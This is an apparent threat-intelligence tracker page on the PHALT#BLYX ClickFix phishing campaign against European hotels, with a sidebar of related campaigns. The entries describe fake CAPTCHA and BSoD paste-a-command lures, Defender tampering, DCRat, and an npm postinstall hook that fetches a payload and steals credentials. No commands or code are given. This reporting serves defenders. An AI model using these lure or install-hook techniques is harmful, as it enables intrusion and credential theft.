PHALT#BLYX ClickFix phishing campaign targets European hospitality with DCRat
Campaign
Summary
Hide ▲
Show ▼
PHALT#BLYX is an active ClickFix-style phishing campaign that targets the European hospitality sector and uses Booking.com-themed reservation-cancellation lures to push victims into running malicious PowerShell. The operation matters because fake CAPTCHA pages and bogus BSoD recovery prompts are used to trigger code execution, enabling MSBuild.exe-based payload delivery, Defender tampering, and DCRat installation.
Related Happenings
KongTuke Microsoft Teams initial access campaign
Campaign
First: 14.05.2026 15:12
Last: 14.05.2026 15:12
Sources 1
About this happening:
The **KongTuke** campaign now uses **Microsoft Teams** social engineering to gain persistent access to **corporate networks**, shortening initial compromise to **under five minute...
KongTuke Microsoft Teams initial access campaign
CampaignAbout this happening: The **KongTuke** campaign now uses **Microsoft Teams** social engineering to gain persistent access to **corporate networks**, shortening initial compromise to **under five minute...
Silver Fox South Asia phishing campaign
Campaign
First: 24.03.2026 18:00
Last: 24.03.2026 18:00
Sources 1
About this happening:
The **Silver Fox** campaign now includes **BYOVD** abuse of a previously unknown **WatchDog Anti-malware** driver, **amsdk.sys (version 1.0.600)**, to disable security tools on co...
Silver Fox South Asia phishing campaign
CampaignAbout this happening: The **Silver Fox** campaign now includes **BYOVD** abuse of a previously unknown **WatchDog Anti-malware** driver, **amsdk.sys (version 1.0.600)**, to disable security tools on co...
Microsoft Teams Quick Assist A0Backdoor phishing campaign
Campaign
First: 10.03.2026 00:50
Last: 10.03.2026 00:50
Sources 1
About this happening:
The **Microsoft Teams** phishing campaign is tricking employees at **financial and healthcare organizations** into starting **Quick Assist** remote sessions, creating an immediate...
Microsoft Teams Quick Assist A0Backdoor phishing campaign
CampaignAbout this happening: The **Microsoft Teams** phishing campaign is tricking employees at **financial and healthcare organizations** into starting **Quick Assist** remote sessions, creating an immediate...
A0Backdoor malware deployed through signed MSI sideloading and DNS MX C2
Malware Activity
First: 10.03.2026 00:50
Last: 10.03.2026 00:50
Sources 1
About this happening:
The **A0Backdoor** malware was deployed on **Windows endpoints** through **digitally signed MSI installers** and **DLL sideloading**, giving the operators a stealthier path to exe...
A0Backdoor malware deployed through signed MSI sideloading and DNS MX C2
Malware ActivityAbout this happening: The **A0Backdoor** malware was deployed on **Windows endpoints** through **digitally signed MSI installers** and **DLL sideloading**, giving the operators a stealthier path to exe...
OpenClaw fake installer GitHub campaign promoted by Bing AI
Campaign
First: 06.03.2026 00:37
Last: 06.03.2026 00:37
Sources 1
About this happening:
A **last month** campaign used **fake OpenClaw installers** on **GitHub** and **Bing AI**-promoted search results to push **malware loaders** and **infostealers** to people trying...
OpenClaw fake installer GitHub campaign promoted by Bing AI
CampaignAbout this happening: A **last month** campaign used **fake OpenClaw installers** on **GitHub** and **Bing AI**-promoted search results to push **malware loaders** and **infostealers** to people trying...
Latest development: 09.03.2026 20:31
A malicious npm package named @openclaw-ai/openclawai, uploaded on March 3, 2026, masquerades as an OpenClaw installer and uses a postinstall hook to launch scripts/setup.js, display a fake CLI and iCloud Keychain prompt, and fetch a second-stage payload from trackpipe[.]dev. The chain installs a persistent RAT internally identified as GhostLoader and steals macOS Keychain data, browser credentials, crypto wallets, SSH keys, Apple Notes, iMessage history, Safari history, and Mail data before exfiltrating a tar.gz archive through the C2 server, Telegram Bot API, and GoFile.io.
Timeline
-
06.01.2026 14:13 2 articles · 4mo ago
PHALT#BLYX ClickFix phishing campaign targets European hospitality with DCRat
Initial DisclosureThe initial access phase starts with a phishing email impersonating **Booking.com** and warning recipients about an unexpected reservation cancellation. A fake website then presents a bogus **CAPTCHA** and **BSoD** recovery prompt that tries to get the victim to paste and execute a command in Windows Run.
Show sources
- Fake Booking Emails Redirect Hotel Staff to Fake BSoD Pages Delivering DCRat — thehackernews.com — 06.01.2026 14:13
- Fake Booking Emails Redirect Hotel Staff to Fake BSoD Pages Delivering DCRat — thehackernews.com — 06.01.2026 14:13